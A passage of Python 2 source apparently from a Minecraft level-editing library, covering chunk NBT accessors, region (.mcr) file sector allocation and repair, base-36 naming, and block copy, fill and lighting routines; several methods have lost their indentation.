            height = length / (chunkSize * chunkSize)
            self.world.Height = height
            self.world.HeightOverride = True
            self.world._bounds = None
        chunkTag[Level][Blocks].value.shape = (chunkSize, chunkSize, self.world.Height)
        chunkTag[Level][HeightMap].value.shape = (chunkSize, chunkSize);
        # light/Data arrays are nibble-packed at this point: Height / 2 bytes
        chunkTag[Level][SkyLight].value.shape = (chunkSize, chunkSize, self.world.Height / 2)
        chunkTag[Level][BlockLight].value.shape = (chunkSize, chunkSize, self.world.Height / 2)
        # NOTE(review): string literal "Data" here where siblings use the
        # module constant -- presumably equal; confirm and unify.
        chunkTag[Level]["Data"].value.shape = (chunkSize, chunkSize, self.world.Height / 2)
        if TileEntities not in chunkTag[Level]:
            chunkTag[Level][TileEntities] = TAG_List();
        if Entities not in chunkTag[Level]:
            chunkTag[Level][Entities] = TAG_List();
    def addEntity(self, entityTag):
        """Add an entity to this chunk, coercing its Motion/Position lists
        to TAG_Double as the game expects, and mark the chunk dirty."""
        def doubleize(name):
            # rebuild the named list with TAG_Double elements (source may
            # carry floats, e.g. from schematics)
            if name in entityTag:
                m = entityTag[name]
                entityTag[name] = TAG_List([TAG_Double(i.value) for i in m])
        doubleize("Motion")
        # NOTE(review): vanilla entity NBT stores position under "Pos",
        # not "Position" -- if so this call never matches; confirm against
        # the entity tags actually passed in.
        doubleize("Position")
        self.dirty = True
        return super(InfdevChunk, self).addEntity(entityTag)
def removeEntitiesInBox(self, box):
self.dirty = True;
return super(InfdevChunk, self).removeEntitiesInBox(box)
def removeTileEntitiesInBox(self, box):
self.dirty = True;
return super(InfdevChunk, self).removeTileEntitiesInBox(box)
    # --- Array/tag accessors -------------------------------------------------
    # @decompress_first ensures the tag tree is decoded before access;
    # @unpack_first additionally expands nibble-packed arrays to bytes.
    @property
    @decompress_first
    def Blocks(self):
        # 16x16xHeight uint8 block IDs
        return self.root_tag[Level][Blocks].value
    @property
    @decompress_first
    @unpack_first
    def Data(self):
        # per-block 4-bit data values, unpacked to one byte each
        return self.root_tag[Level][Data].value
    @property
    @decompress_first
    def HeightMap(self):
        # 16x16 highest-block map (see genFastLights: indexed [z, x])
        return self.root_tag[Level][HeightMap].value
    @property
    @decompress_first
    @unpack_first
    def SkyLight(self):
        return self.root_tag[Level][SkyLight].value
    @property
    @decompress_first
    @unpack_first
    def BlockLight(self):
        return self.root_tag[Level][BlockLight].value
    @property
    @decompress_first
    def Entities(self):
        # TAG_List of entity compounds (returned as the tag, not .value)
        return self.root_tag[Level][Entities]
    @property
    @decompress_first
    def TileEntities(self):
        return self.root_tag[Level][TileEntities]
    @property
    @decompress_first
    def TerrainPopulated(self):
        return self.root_tag[Level]["TerrainPopulated"].value;
    @TerrainPopulated.setter
    @decompress_first
    def TerrainPopulated(self, val):
        """True or False. If False, the game will populate the chunk with
        ores and vegetation on next load"""
        self.root_tag[Level]["TerrainPopulated"].value = val;
class dequeset(object):
    """An insertion-ordered collection with O(1) membership tests.

    Pairs a deque (keeps order, supports indexing) with a set (fast
    `in` and `len`). discard() is a no-op for absent items."""

    def __init__(self):
        self.deque = deque()
        self.set = set()

    def __contains__(self, obj):
        return obj in self.set

    def __len__(self):
        return len(self.set)

    def append(self, obj):
        """Add obj at the end and index it for membership tests."""
        self.deque.append(obj)
        self.set.add(obj)

    def discard(self, obj):
        """Remove obj if present; silently ignore otherwise."""
        if obj not in self.set:
            return
        self.deque.remove(obj)
        self.set.discard(obj)

    def __getitem__(self, idx):
        return self.deque[idx]
class MCRegionFile(object):
    """A Minecraft region (.mcr) file: a 4 KiB-sector store of up to
    32x32 compressed chunks.

    Sector 0 holds the offset table (one big-endian u4 per chunk slot:
    sector number << 8 | sector count), sector 1 the modification times.
    freeSectors tracks which sectors are unallocated."""
    holdFileOpen = False #if False, reopens and recloses the file on each access
    @property
    def file(self):
        # always returns a context manager; notclosing() wraps the shared
        # handle so `with` blocks don't close it when holdFileOpen is set
        openfile = lambda:file(self.path, "rb+")
        if MCRegionFile.holdFileOpen:
            if self._file is None:
                self._file = openfile()
            return notclosing(self._file)
        else:
            return openfile()
    def close(self):
        # only meaningful when a persistent handle is held
        if MCRegionFile.holdFileOpen:
            self._file.close()
            self._file = None
    def __init__(self, path, regionCoords):
        """Open (creating if needed) the region file at `path` for region
        coordinates `regionCoords`, pad it to whole sectors, read the
        offset/modtime tables, and repair inconsistencies if found."""
        self.path = path
        self.regionCoords = regionCoords
        self._file = None
        if not os.path.exists(path):
            file(path, "w").close()
        with self.file as f:
            filesize = os.path.getsize(path)
            # round a ragged file up to a whole number of sectors
            if filesize & 0xfff:
                filesize = (filesize | 0xfff) + 1
                f.truncate(filesize)
            # a brand-new file needs room for the two header sectors
            if filesize == 0:
                filesize = self.SECTOR_BYTES * 2
                f.truncate(filesize)
            f.seek(0)
            offsetsData = f.read(self.SECTOR_BYTES)
            modTimesData = f.read(self.SECTOR_BYTES)
            self.freeSectors = [True] * (filesize / self.SECTOR_BYTES)
            # sectors 0 and 1 are the header tables, never free
            self.freeSectors[0:2] = False, False
            self.offsets = fromstring(offsetsData, dtype='>u4')
            self.modTimes = fromstring(modTimesData, dtype='>u4')
        # walk the offset table: mark used sectors, detect out-of-range
        # entries and overlapping allocations
        needsRepair = False
        for offset in self.offsets:
            sector = offset >> 8
            count = offset & 0xff
            for i in xrange(sector, sector + count):
                if i >= len(self.freeSectors):
                    #raise RegionMalformed, "Region file offset table points to sector {0} (past the end of the file)".format(i)
                    print "Region file offset table points to sector {0} (past the end of the file)".format(i)
                    needsRepair = True
                    break
                if self.freeSectors[i] is False:
                    # two chunks claim the same sector
                    needsRepair = True
                self.freeSectors[i] = False
        if needsRepair:
            self.repair()
        info("Found region file {file} with {used}/{total} sectors used and {chunks} chunks present".format(
             file=os.path.basename(path), used=self.usedSectors, total=self.sectorCount, chunks=self.chunkCount))
    @property
    def usedSectors(self): return len(self.freeSectors) - sum(self.freeSectors)
    @property
    def sectorCount(self): return len(self.freeSectors)
    @property
    def chunkCount(self): return sum(self.offsets > 0)
    def repair(self):
        """Validate every chunk entry; delete unreadable/misplaced ones and
        re-save readable chunks found in the wrong slot or overlapping."""
        lostAndFound = {}
        _freeSectors = [True] * len(self.freeSectors)
        _freeSectors[0] = _freeSectors[1] = False
        deleted = 0
        recovered = 0
        info("Beginning repairs on {file} ({chunks} chunks)".format(file=os.path.basename(self.path), chunks=sum(self.offsets > 0)))
        rx, rz = self.regionCoords
        for index, offset in enumerate(self.offsets):
            if offset:
                # slot index -> absolute chunk coordinates within this region
                cx = index & 0x1f
                cz = index >> 5
                cx += rx << 5
                cz += rz << 5
                sectorStart = offset >> 8
                sectorCount = offset & 0xff
                try:
                    if sectorStart + sectorCount > len(self.freeSectors):
                        raise RegionMalformed, "Offset {start}:{end} ({offset}) at index {index} pointed outside of the file".format(
                            start=sectorStart, end=sectorStart + sectorCount, index=index, offset=offset)
                    compressedData = self._readChunk(cx, cz)
                    if compressedData is None:
                        raise RegionMalformed, "Failed to read chunk data for {0}".format((cx, cz))
                    format, data = self.decompressSectors(compressedData)
                    chunkTag = nbt.load(buf=data)
                    lev = chunkTag["Level"]
                    xPos = lev["xPos"].value
                    zPos = lev["zPos"].value
                    overlaps = False
                    for i in xrange(sectorStart, sectorStart + sectorCount):
                        if _freeSectors[i] is False:
                            overlaps = True
                        _freeSectors[i] = False
                    if xPos != cx or zPos != cz or overlaps:
                        # readable but misplaced/overlapping: stash for
                        # recovery, then fall through to deletion below
                        lostAndFound[xPos, zPos] = (format, compressedData)
                        if (xPos, zPos) != (cx, cz):
                            raise RegionMalformed, "Chunk {found} was found in the slot reserved for {expected}".format(found=(xPos, zPos), expected=(cx, cz))
                        else:
                            raise RegionMalformed, "Chunk {found} (in slot {expected}) has overlapping sectors with another chunk!".format(found=(xPos, zPos), expected=(cx, cz))
                except Exception, e:
                    info("Unexpected chunk data at sector {sector} ({exc})".format(sector=sectorStart, exc=e))
                    self.setOffset(cx, cz, 0)
                    deleted += 1
        # re-save stashed chunks whose proper slot is now empty
        for cPos, (format, foundData) in lostAndFound.iteritems():
            cx, cz = cPos
            if self.getOffset(cx, cz) == 0:
                info("Found chunk {found} and its slot is empty, recovering it".format(found=cPos))
                # strip the 5-byte length/format header before re-saving
                self._saveChunk(cx, cz, foundData[5:], format)
                recovered += 1
        info("Repair complete. Removed {0} chunks, recovered {1} chunks, net {2}".format(deleted, recovered, recovered - deleted))
    def extractAllChunks(self, folder):
        """Dump every chunk in this region as an individual gzip-compressed
        c.<x>.<z>.dat file (old chunk-per-file format) into `folder`."""
        if not os.path.exists(folder):
            os.mkdir(folder)
        for cx, cz in itertools.product(range(32), range(32)):
            sectors = self._readChunk(cx, cz)
            if sectors is not None:
                format, compressedData = self.unpackSectors(sectors)
                data = self._decompressSectors(format, compressedData)
                chunkTag = nbt.load(buf=data)
                lev = chunkTag["Level"]
                xPos = lev["xPos"].value
                zPos = lev["zPos"].value
                gzdata = InfdevChunk.compressTagGzip(chunkTag)
                #print chunkTag.pretty_string()
                with file(os.path.join(folder, "c.{0}.{1}.dat".format(base36(xPos), base36(zPos))), "wb") as f:
                    f.write(gzdata)
    def _readChunk(self, cx, cz):
        """Return the raw sector data (header included) for chunk (cx, cz),
        or None if the chunk is absent or its offset entry is invalid."""
        cx &= 0x1f
        cz &= 0x1f
        offset = self.getOffset(cx, cz)
        if offset == 0: return None
        sectorStart = offset >> 8
        numSectors = offset & 0xff
        if numSectors == 0: return None
        if sectorStart + numSectors > len(self.freeSectors):
            return None
        with self.file as f:
            f.seek(sectorStart * self.SECTOR_BYTES)
            data = f.read(numSectors * self.SECTOR_BYTES)
        assert(len(data) > 0)
        #debug("REGION LOAD {0},{1} sector {2}".format(cx, cz, sectorStart))
        return data
    def loadChunk(self, chunk):
        """Populate `chunk` from this region: compressedTag gets the raw
        compressed payload, root_tag the decoded NBT tree.
        Raises ChunkNotPresent when the chunk has no data here."""
        cx, cz = chunk.chunkPosition
        data = self._readChunk(cx, cz)
        if data is None: raise ChunkNotPresent, (cx, cz, self)
        # skip the 5-byte length/format header for the stored payload
        chunk.compressedTag = data[5:]
        format, data = self.decompressSectors(data)
        chunk.root_tag = nbt.load(buf=data)
        chunk.compressMode = format
    def unpackSectors(self, data):
        """Split raw sector data into (format, payload) using the 5-byte
        header: u4 big-endian length, then a 1-byte compression format."""
        length = struct.unpack_from(">I", data)[0]
        format = struct.unpack_from("B", data, 4)[0]
        data = data[5:length + 5]
        return (format, data)
    def _decompressSectors(self, format, data):
        # format byte selects gzip (1) or raw zlib/deflate (2)
        if format == self.VERSION_GZIP:
            return gunzip(data)
        if format == self.VERSION_DEFLATE:
            return inflate(data)
        raise IOError, "Unknown compress format: {0}".format(format)
    def decompressSectors(self, data):
        format, data = self.unpackSectors(data)
        return format, self._decompressSectors(format, data)
    def saveChunk(self, chunk):
        """Write `chunk`'s already-compressed payload into this region."""
        cx, cz = chunk.chunkPosition
        data = chunk.compressedTag
        format = chunk.compressMode
        self._saveChunk(cx, cz, data, format)
    def _saveChunk(self, cx, cz, data, format):
        """Allocate sectors for `data` (rewriting in place when it still
        fits), growing the file if no large-enough free run exists.
        Chunks needing >= 256 sectors are silently dropped (the sector
        count field is one byte)."""
        cx &= 0x1f
        cz &= 0x1f
        offset = self.getOffset(cx, cz)
        sectorNumber = offset >> 8
        sectorsAllocated = offset & 0xff
        sectorsNeeded = (len(data) + self.CHUNK_HEADER_SIZE) / self.SECTOR_BYTES + 1;
        if sectorsNeeded >= 256: return
        if (sectorNumber != 0 and sectorsAllocated >= sectorsNeeded):
            debug("REGION SAVE {0},{1} rewriting {2}b".format(cx, cz, len(data)))
            self.writeSector(sectorNumber, data, format)
        else:
            # we need to allocate new sectors
            # mark the sectors previously used for this chunk as free
            for i in xrange(sectorNumber, sectorNumber + sectorsAllocated):
                self.freeSectors[i] = True
            # scan for a contiguous run of free sectors long enough
            runLength = 0
            try:
                runStart = self.freeSectors.index(True)
                for i in range(runStart, len(self.freeSectors)):
                    if runLength:
                        if self.freeSectors[i]:
                            runLength += 1
                        else:
                            runLength = 0
                    elif self.freeSectors[i]:
                        runStart = i
                        runLength = 1
                    if runLength >= sectorsNeeded:
                        break
            except ValueError:
                pass
            # we found a free space large enough
            if runLength >= sectorsNeeded:
                debug("REGION SAVE {0},{1}, reusing {2}b".format(cx, cz, len(data)))
                sectorNumber = runStart
                self.setOffset(cx, cz, sectorNumber << 8 | sectorsNeeded)
                self.writeSector(sectorNumber, data, format)
                self.freeSectors[sectorNumber:sectorNumber + sectorsNeeded] = [False] * sectorsNeeded
            else:
                # no free space large enough found -- we need to grow the
                # file
                debug("REGION SAVE {0},{1}, growing by {2}b".format(cx, cz, len(data)))
                with self.file as f:
                    f.seek(0, 2)
                    filesize = f.tell()
                    sectorNumber = len(self.freeSectors)
                    assert sectorNumber * self.SECTOR_BYTES == filesize
                    filesize += sectorsNeeded * self.SECTOR_BYTES
                    f.truncate(filesize)
                self.freeSectors += [False] * sectorsNeeded
                self.setOffset(cx, cz, sectorNumber << 8 | sectorsNeeded)
                self.writeSector(sectorNumber, data, format)
    def writeSector(self, sectorNumber, data, format):
        # writes the 5-byte header (length includes the format byte)
        # followed by the payload
        with self.file as f:
            debug("REGION: Writing sector {0}".format(sectorNumber))
            f.seek(sectorNumber * self.SECTOR_BYTES)
            f.write(struct.pack(">I", len(data) + 1));# // chunk length
            f.write(struct.pack("B", format));# // chunk version number
            f.write(data);# // chunk data
            #f.flush()
    def containsChunk(self, cx,cz):
        return self.getOffset(cx,cz) != 0
    def getOffset(self, cx, cz):
        # offset-table entry for the chunk's slot within this region
        cx &= 0x1f;
        cz &= 0x1f
        return self.offsets[cx + cz * 32]
    def setOffset(self, cx, cz, offset):
        # update both the in-memory table and the header sector on disk
        cx &= 0x1f;
        cz &= 0x1f
        self.offsets[cx + cz * 32] = offset
        with self.file as f:
            f.seek(0)
            f.write(self.offsets.tostring())
    SECTOR_BYTES = 4096
    SECTOR_INTS = SECTOR_BYTES / 4
    CHUNK_HEADER_SIZE = 5;
    VERSION_GZIP = 1
    VERSION_DEFLATE = 2
    compressMode = VERSION_DEFLATE
# digit set for base-36 chunk-file names (c.<x>.<z>.dat)
base36alphabet = "0123456789abcdefghijklmnopqrstuvwxyz"
def decbase36(s):
    # int() handles an optional leading '-' and base-36 digits directly
    return int(s, 36)
def base36(n):
    """Return the base-36 string for integer *n*, using digits 0-9a-z.

    Negative values get a leading '-'; base36(0) == '0'. Non-integer
    input is truncated via int(), matching the previous behavior.
    """
    # bind the digit table locally: the module-level constant is never
    # mutated, and the old `global` declaration was needless for reads
    alphabet = "0123456789abcdefghijklmnopqrstuvwxyz"
    n = int(n)
    if n == 0:
        return '0'
    neg = ""
    if n < 0:
        neg = "-"
        n = -n
    digits = []
    while n:
        n, digit = divmod(n, 36)
        digits.append(alphabet[digit])
    return neg + ''.join(reversed(digits))
def deflate(data):
    """Compress *data* with zlib at the default level (zlib/RFC 1950
    framing). Counterpart of inflate(); used for region chunk payloads
    (VERSION_DEFLATE)."""
    return zlib.compress(data)
def inflate(data):
    """Decompress zlib-format (RFC 1950) *data*; inverse of deflate()."""
    return zlib.decompress(data)
class ChunkedLevelMixin(object):
def blockLightAt(self, x, y, z):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
ch = self.getChunk(xc, zc)
return ch.BlockLight[xInChunk, zInChunk, y]
def setBlockLightAt(self, x, y, z, newLight):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
ch = self.getChunk(xc, zc)
ch.BlockLight[xInChunk, zInChunk, y] = newLight
ch.chunkChanged(False)
def blockDataAt(self, x, y, z):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
try:
ch = self.getChunk(xc, zc)
except ChunkNotPresent:
return 0
return ch.Data[xInChunk, zInChunk, y]
def setBlockDataAt(self, x, y, z, newdata):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
try:
ch = self.getChunk(xc, zc)
except ChunkNotPresent:
return 0
ch.Data[xInChunk, zInChunk, y] = newdata
ch.dirty = True
ch.needsLighting = True
def blockAt(self, x, y, z):
"""returns 0 for blocks outside the loadable chunks. automatically loads chunks."""
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
try:
ch = self.getChunk(xc, zc)
except ChunkNotPresent:
return 0
return ch.Blocks[xInChunk, zInChunk, y]
def setBlockAt(self, x, y, z, blockID):
"""returns 0 for blocks outside the loadable chunks. automatically loads chunks."""
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
try:
ch = self.getChunk(xc, zc)
except ChunkNotPresent:
return 0
ch.Blocks[xInChunk, zInChunk, y] = blockID
ch.dirty = True
ch.needsLighting = True
def skylightAt(self, x, y, z):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf
ch = self.getChunk(xc, zc)
return ch.SkyLight[xInChunk, zInChunk, y]
def setSkylightAt(self, x, y, z, lightValue):
if y < 0 or y >= self.Height: return 0
zc = z >> 4
xc = x >> 4
xInChunk = x & 0xf;
zInChunk = z & 0xf;
ch = self.getChunk(xc, zc)
skyLight = ch.SkyLight
oldValue = skyLight[xInChunk, zInChunk, y]
ch.chunkChanged(False)
if oldValue < lightValue:
skyLight[xInChunk, zInChunk, y] = lightValue
return oldValue < lightValue
def sourceMaskFunc(self, blocksToCopy):
if blocksToCopy is not None:
typemask = zeros((256) , dtype='bool')
typemask[blocksToCopy] = 1;
def sourceMask(sourceBlocks):
return typemask[sourceBlocks]
else:
def sourceMask(_sourceBlocks):
return slice(None, None)
return sourceMask
    def copyBlocksFromFiniteIter(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy, create = False):
        """Generator: copy blocks from a finite level into this chunked
        level, one destination chunk at a time, yielding (i, chunkCount)
        progress tuples. Optionally creates missing destination chunks.
        """
        #assumes destination point and bounds have already been checked.
        (sx, sy, sz) = sourceBox.origin
        start = datetime.now();
        sourceMask = self.sourceMaskFunc(blocksToCopy)
        destBox = BoundingBox(destinationPoint, sourceBox.size)
        i = 0;
        chunkCount = float(destBox.chunkCount)
        for (cPos, slices, point) in self._getSlices(destBox):
            if not self.containsChunk(*cPos):
                if create:
                    self.createChunk(*cPos)
                else:
                    continue
            chunk = self.getChunk(*cPos)
            i += 1;
            yield (i, chunkCount)
            if i % 100 == 0:
                info("Chunk {0}...".format(i))
            blocks = chunk.Blocks[slices];
            # source region matching this chunk slice; note axis order:
            # chunk arrays are (x, z, y) while the finite level is sliced
            # (x, z, y) with y taken from blocks.shape[2]
            localSourceCorner2 = (
                sx + point[0] + blocks.shape[0],
                sy + blocks.shape[2],
                sz + point[2] + blocks.shape[1],
            )
            sourceBlocks = sourceLevel.Blocks[sx + point[0]:localSourceCorner2[0],
                                              sz + point[2]:localSourceCorner2[2],
                                              sy:localSourceCorner2[1]]
            #sourceBlocks = filterTable[sourceBlocks]
            mask = sourceMask(sourceBlocks)
            #for small level slices, reduce the destination area
            x, z, y = sourceBlocks.shape
            blocks = blocks[0:x, 0:z, 0:y]
            sourceData = None
            if hasattr(sourceLevel, 'Data'):
                #indev or schematic
                sourceData = sourceLevel.Data[sx + point[0]:localSourceCorner2[0],
                                              sz + point[2]:localSourceCorner2[2],
                                              sy:localSourceCorner2[1]]
            data = chunk.Data[slices][0:x, 0:z, 0:y]
            convertedSourceBlocks, convertedSourceData = self.convertBlocksFromLevel(sourceLevel, sourceBlocks, sourceData)
            blocks[mask] = convertedSourceBlocks[mask]
            if convertedSourceData is not None:
                data[mask] = (convertedSourceData[:, :, :])[mask]
                # Data values are 4-bit; clamp anything converted
                data[mask] &= 0xf;
            chunk.chunkChanged();
        d = datetime.now() - start;
        if i:
            info("Finished {2} chunks in {0} ({1} per chunk)".format(d, d / i, i))
        #chunk.compress(); #xxx find out why this trashes changes to tile entities
    def copyBlocksFromInfiniteIter(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy, create = False):
        """ copy blocks between two infinite levels by looping through the
        destination's chunks. make a sub-box of the source level for each chunk
        and copy block and entities in the sub box to the dest chunk.

        Generator; yields (i, chunkCount) progress tuples. With create=True,
        destination chunks are created only when the matching source region
        actually has chunks."""
        #assumes destination point and bounds have already been checked.
        destBox = BoundingBox(destinationPoint, sourceBox.size)
        chunkCount = destBox.chunkCount
        i = 0
        sourceMask = self.sourceMaskFunc(blocksToCopy)
        def subbox(slices, point):
            # destination chunk-slice -> equivalent box in source coordinates;
            # slice order is (x, z, y) but BoundingBox size is (x, y, z)
            size = [s.stop - s.start for s in slices]
            size[1], size[2] = size[2], size[1]
            return BoundingBox([p + a for p, a in zip(point, sourceBox.origin)], size)
        def shouldCreateFunc(slices, point):
            # only create a destination chunk if the source has data there
            box = subbox(slices, point)
            b = any(list(sourceLevel.containsChunk(*c) for c in box.chunkPositions)) #any() won't take a generator-expression :(
            #if b == False:
            #    print 'Skipped ', list(box.chunkPositions)
            return b
        for cPos, slices, point in self._getSlices(destBox):
            if not self.containsChunk(*cPos):
                if shouldCreateFunc(slices, point):
                    self.createChunk(*cPos)
                else:
                    continue
            chunk = self.getChunk(*cPos)
            i += 1
            yield (i, chunkCount)
            if i % 100 == 0:
                info("Chunk {0}...".format(i))
            dstblocks = chunk.Blocks[slices]
            dstdata = chunk.Data[slices]
            sourceSubBox = subbox(slices, point)
            for srcchunk, srcslices, srcpoint in sourceLevel.getChunkSlices(sourceSubBox):
                # reorder (x, y, z) -> (x, z, y) to match chunk array axes
                srcpoint = srcpoint[0], srcpoint[2], srcpoint[1]
                sourceBlocks = srcchunk.Blocks[srcslices]
                sourceData = srcchunk.Data[srcslices]
                mask = sourceMask(sourceBlocks)
                convertedSourceBlocks, convertedSourceData = self.convertBlocksFromLevel(sourceLevel, sourceBlocks, sourceData)
                dstslices = [slice(p, p + (s.stop - s.start)) for p, s in zip(srcpoint, srcslices)]
                dstblocks[dstslices][mask] = convertedSourceBlocks[mask]
                if convertedSourceData is not None:
                    dstdata[dstslices][mask] = convertedSourceData[mask]
            chunk.chunkChanged()
def copyBlocksFrom(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy=None, entities=True, create=False):
return exhaust(self.copyBlocksFromIter(sourceLevel, sourceBox, destinationPoint, blocksToCopy, entities, create))
    def copyBlocksFromIter(self, sourceLevel, sourceBox, destinationPoint, blocksToCopy=None, entities=True, create=False):
        """Generator: copy a box of blocks (and optionally entities) from
        another level into this one, dispatching to the finite or infinite
        implementation based on the source. Yields progress tuples."""
        (x, y, z) = destinationPoint;
        (lx, ly, lz) = sourceBox.size
        #sourcePoint, sourcePoint1 = sourceBox
        # clip box/point so the copy stays within both levels' bounds
        sourceBox, destinationPoint = self.adjustCopyParameters(sourceLevel, sourceBox, destinationPoint)
        #needs work xxx
        info(u"Copying {0} blocks from {1} to {2}" .format (ly * lz * lx, sourceBox, destinationPoint))
        startTime = datetime.now()
        if not sourceLevel.isInfinite:
            for i in self.copyBlocksFromFiniteIter(sourceLevel, sourceBox, destinationPoint, blocksToCopy, create):
                yield i
        else:
            for i in self.copyBlocksFromInfiniteIter(sourceLevel, sourceBox, destinationPoint, blocksToCopy, create):
                yield i
        for i in self.copyEntitiesFromIter(sourceLevel, sourceBox, destinationPoint, entities):
            yield i
        info("Duration: {0}".format(datetime.now() - startTime))
        #self.saveInPlace()
def fillBlocks(self, box, blockInfo, blocksToReplace=[]):
return exhaust(self.fillBlocksIter(box, blockInfo, blocksToReplace))
    def fillBlocksIter(self, box, blockInfo, blocksToReplace=[]):
        """Generator: fill `box` (or the whole level when box is None) with
        `blockInfo`, yielding (i, chunkCount) progress tuples.

        With a non-empty `blocksToReplace`, only those block types are
        replaced; block data is preserved when every replaced type shares
        blockInfo's rotation class, and lighting is only recalculated if
        absorption/emission actually changes. Tile entities at replaced
        positions are removed.
        NOTE: the `[]` default is a mutable default argument, but it is
        never mutated here, so it is harmless in practice."""
        if box is None:
            # no box means the entire level
            chunkIterator = self.getAllChunkSlices()
            box = self.bounds
        else:
            chunkIterator = self.getChunkSlices(box)
        #shouldRetainData = (not blockInfo.hasVariants and not any([b.hasVariants for b in blocksToReplace]))
        #if shouldRetainData:
        #    info( "Preserving data bytes" )
        shouldRetainData = False #xxx old behavior overwrote blockdata with 0 when e.g. replacing water with lava
        info("Replacing {0} with {1}".format(blocksToReplace, blockInfo))
        changesLighting = True
        if len(blocksToReplace):
            blocktable = self.blockReplaceTable(blocksToReplace)
            shouldRetainData = all([blockrotation.SameRotationType(blockInfo, b) for b in blocksToReplace])
            # lighting only needs a recalc when absorption or emission differs
            newAbsorption = self.materials.lightAbsorption[blockInfo.ID]
            oldAbsorptions = [self.materials.lightAbsorption[b.ID] for b in blocksToReplace]
            changesLighting = False
            for a in oldAbsorptions:
                if a != newAbsorption: changesLighting = True;
            newEmission = self.materials.lightEmission[blockInfo.ID]
            oldEmissions = [self.materials.lightEmission[b.ID] for b in blocksToReplace]
            for a in oldEmissions:
                if a != newEmission: changesLighting = True;
        i = 0;
        skipped = 0
        replaced = 0;
        for (chunk, slices, point) in chunkIterator:
            i += 1;
            if i % 100 == 0:
                info(u"Chunk {0}...".format(i))
            yield i, box.chunkCount
            blocks = chunk.Blocks[slices]
            data = chunk.Data[slices]
            mask = slice(None)
            needsLighting = changesLighting;
            if len(blocksToReplace):
                # 2D lookup keyed on (blockID, blockData)
                mask = blocktable[blocks, data]
                blockCount = mask.sum()
                replaced += blockCount;
                #don't waste time relighting and copying if the mask is empty
                if blockCount:
                    blocks[:][mask] = blockInfo.ID
                    if not shouldRetainData:
                        data[mask] = blockInfo.blockData
                else:
                    skipped += 1;
                    needsLighting = False;
                def include(tileEntity):
                    # keep tile entities outside the box or at unreplaced cells
                    p = TileEntity.pos(tileEntity)
                    x, y, z = map(lambda a, b, c:(a - b) - c, p, point, box.origin)
                    return not ((p in box) and mask[x, z, y])
                chunk.TileEntities.value[:] = filter(include, chunk.TileEntities)
            else:
                # unconditional fill
                blocks[:] = blockInfo.ID
                if not shouldRetainData:
                    data[:] = blockInfo.blockData
                chunk.removeTileEntitiesInBox(box)
            chunk.chunkChanged(needsLighting);
        if len(blocksToReplace):
            info(u"Replace: Skipped {0} chunks, replaced {1} blocks".format(skipped, replaced))
def generateLights(self, dirtyChunks=None):
return exhaust(self.generateLightsIter(dirtyChunks))
def _getChunkUnloaded(self, cx, cz):
return self.getChunk(cx,cz)
    def generateLightsIter(self, dirtyChunks=None):
        """ dirtyChunks may be an iterable yielding (xPos,zPos) tuples
        if none, generate lights for all chunks that need lighting

        Generator; yields (done, total, progressText) tuples. Large jobs
        are recursively split into spatial quarters of at most
        maxLightingChunks chunks each to bound memory use.
        """
        startTime = datetime.now();
        if dirtyChunks is None:
            dirtyChunks = (ch for ch in self._loadedChunks.itervalues() if ch.needsLighting)
        else:
            dirtyChunks = (self._getChunkUnloaded(*c) for c in dirtyChunks if self.containsChunk(*c))
        dirtyChunks = sorted(dirtyChunks, key=lambda x:x.chunkPosition)
        #at 150k per loaded chunk,
        maxLightingChunks = 4000
        info(u"Asked to light {0} chunks".format(len(dirtyChunks)))
        chunkLists = [dirtyChunks];
        def reverseChunkPosition(x):
            cx, cz = x.chunkPosition;
            return cz, cx
        def splitChunkLists(chunkLists):
            # quarter each list spatially: halve on x, then halve each half on z
            newChunkLists = []
            for l in chunkLists:
                #list is already sorted on x position, so this splits into left and right
                smallX = l[:len(l) / 2]
                bigX = l[len(l) / 2:]
                #sort halves on z position
                smallX = sorted(smallX, key=reverseChunkPosition)
                bigX = sorted(bigX, key=reverseChunkPosition)
                #add quarters to list
                newChunkLists.append(smallX[:len(smallX) / 2])
                newChunkLists.append(smallX[len(smallX) / 2:])
                newChunkLists.append(bigX[:len(bigX) / 2])
                newChunkLists.append(bigX[len(bigX) / 2:])
            return newChunkLists
        while len(chunkLists[0]) > maxLightingChunks:
            chunkLists = splitChunkLists(chunkLists);
        if len(chunkLists) > 1:
            info(u"Using {0} batches to conserve memory.".format(len(chunkLists)))
        #batchSize = min(len(a) for a in chunkLists)
        # rough per-batch work estimate, refined with the real totals as
        # each batch reports back
        estimatedTotals = [len(a) * 32 for a in chunkLists]
        workDone = 0
        for i, dc in enumerate(chunkLists):
            info(u"Batch {0}/{1}".format(i, len(chunkLists)))
            dc = sorted(dc, key=lambda x:x.chunkPosition)
            workTotal = sum(estimatedTotals)
            t = 0
            for c,t,p in self._generateLightsIter(dc):
                yield c+workDone,t + workTotal - estimatedTotals[i], p
            estimatedTotals[i] = t
            workDone += t
            # release memory before the next batch
            for ch in dc:
                ch.compress();
        timeDelta = datetime.now() - startTime;
        if len(dirtyChunks):
            info(u"Completed in {0}, {1} per chunk".format(timeDelta, dirtyChunks and timeDelta / len(dirtyChunks) or 0))
        return;
def _generateLightsIter(self, dirtyChunks):
conserveMemory = False
la = array(self.materials.lightAbsorption)
clip(la, 1, 15, la)
dirtyChunks = set(dirtyChunks)
workDone = 0
workTotal = len(dirtyChunks) * 29
progressInfo = (u"Lighting {0} chunks".format(len(dirtyChunks)))
info(progressInfo)
for i, chunk in enumerate(dirtyChunks):
try:
chunk.load();
except (ChunkNotPresent, ChunkMalformed):
continue;
chunk.chunkChanged();
yield i, workTotal, progressInfo
assert chunk.dirty and chunk.needsLighting
workDone += len(dirtyChunks)
workTotal = len(dirtyChunks)
